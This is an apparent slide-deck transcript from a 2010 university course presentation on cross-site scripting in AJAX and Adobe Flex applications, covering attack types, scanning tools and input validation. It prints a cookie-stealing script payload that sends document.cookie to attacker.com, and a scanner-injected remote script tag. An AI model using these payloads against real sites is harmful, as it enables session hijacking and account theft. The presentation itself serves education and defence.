cross-site scripting (xss) vulnerability in ajax and adobe flex applications danielle cauthen...
TRANSCRIPT
Cross-Site Scripting (XSS) Cross-Site Scripting (XSS) Vulnerability in AJAX and Adobe Vulnerability in AJAX and Adobe Flex ApplicationsFlex Applications
Danielle Cauthen
04/09/2010
COMS E6125 – Web enHanced Information Management
What is Cross-Site What is Cross-Site Scripting?Scripting?Cross-Site Scripting, or XSS (not to be
confused with CSS or Cascading Style Sheets), allows attackers to inject client-side script in a web page.
The attacker injects script, such as JavaScript, VBScript, ActiveX, HTML, or Flash into an application to try to get access to sensitive information
Dynamic websites (using AJAX, Flex, for example) are vulnerable. Static websites are not at risk.
Diagram of XSS AttackDiagram of XSS Attack
*From CGISecurity.com
XSS Compared to Other XSS Compared to Other VulnerabilitiesVulnerabilities XSS is the #1 website security issue, with a 66%
percentage likelihood that a website has the vulnerability:
Statistics from WhiteHat Website Security Report, Fall 2009 edition
XSS TypesXSS TypesTwo types of XSS attacks:
◦Nonaltering (or Non Persistent): causes no change to the page functionality
◦Altering (or Persistent): a script injection that can be placed permanently in the database which causes change to the page functionality that will persist each time the page is requested
Non-Altering (Non-Non-Altering (Non-Persistant)Persistant)Attacker can take a URL that contains
personal data, i.e. www.website.com/username=danielle and modify the username field by entering JavaScript to steal the cookie, altering the url to www.website.com/username=<script>document.location='http://attacker.com/cookiesteal.cgi?'+document.cookie</script>
To diminish suspicion attacker can URL encode JavaScript so it’s not apparent
Altering (Persistent)Altering (Persistent)Within a forum, users posts may
be stored in a database, usually being tracked by a session id cookie
An attacker can post a message containing malicious script, that if a user reads, may compromise their account
Threat to AJAXThreat to AJAXBecause of the JavaScript and client-side
scripting of AJAX, its largest security risk is XSSFrom AJAX: The Definitive Guide:
◦ “Before Ajax, any attack made with an XSS vulnerability was done while the user's browser was in a wait state, and it usually coincided with some kind of visual indication by the browser that would give the user reason to think something untoward was happening.
◦ Once Ajax was introduced, this visual cue would disappear, and the user would have no way of knowing whether malicious code was being executed from the browser.”
Threat to Adobe FlexThreat to Adobe FlexThough not as common as with AJAX, Flex has
also been prone to cross-site scripting, especially if HTML and other scripting features are used in a Flex application
However Adobe, realizing the threat, has strict security in place to prevent XSS. ◦ By default, you cannot call script on an HTML
page if the HTML page is not in the same domain as the Flex application.
◦ Since Flex application is compiled into swf, it cannot itself be vulnerable to XSS
◦ The sandbox security model prevents private information being sent elsewhere.
Testing for XSS Testing for XSS VulnerabilitiesVulnerabilitiesAcunetix Web Vulnerability
Scanner – tool that scans web applications for XSS vulnerabilities (more useful with AJAX applications)
HP SWFScan – tool that is helpful in finding security vulnerabilities in Flex/Flash applications. It decompiles and extracts the code from the .swf file, and then analyzes it for vulnerabilities
Testing AJAX ApplicationTesting AJAX ApplicationUsing Acunetix, Kayak.com (the AJAX
web application for travel comparison) was found to have 146 vulnerabilities
Example: when a user clicks on a menu item, such as Flights, that information is submitted as a GET in a variable named tab. Acunetix was able to manipulate this variable numerous times, on one occasion setting tab to <ScRiPt+bad=">"+src="http://testphp.acutenix.com/xss.js?40392"></ScRiPt>
Testing AJAXTesting AJAX
FlexFlexUsing HP SWFScan, tested Flex
application Sherwin Williams Color Visualizer (www.sherwin-williams.com/visualizer)
No XSS vulnerabilities were found
Testing FlexTesting Flex
ConclusionConclusionXSS can be both damaging and costly
while compromising user securityXSS is bigger risk to AJAX, due to the
JavaScript and client-side scriptingFlex is vulnerable but a lot more
resistant due to Adobe security features
Developers of both AJAX and Flex applications should check and validate any input to ensure it doesn’t include script
ReferencesReferences Acunetix (2010). Web Vulnerability Scanner [Version 6.5]. Retrieved
from http://www.acunetix.com/vulnerability-scanner/download.htm Adobe Systems Incorporated (2004). Cross Site Scripting in Flash.
Retrieved from http://kb2.adobe.com/cps/196/tn_19604.html Adobe Systems Incorporated (2008). Adobe Flex Developer's Guide.
Retrieved from http://livedocs.adobe.com/flex/3/devguide_flex3.pdf Cgisecurity.com (2002, May). The Cross Site Scripting (XSS) FAQ.
Retrieved from http://www.cgisecurity.com/xss-faq.html Hewlett-Packard Development Company, L.P. (2009). SWFScan.
Retrieved from http://www.brothersoft.com/hp-swfscan-253747.html Holdener III, Anthony T. (2008). Ajax: The Definitive Guide.
Sebastopol, CA: O’Reilly Media WhiteHat Security (2009). WhiteHat Website Security Statistics
Report. Retrieved from http://www.whitehatsec.com/home/assets/WPstats_fall09_8th.pdf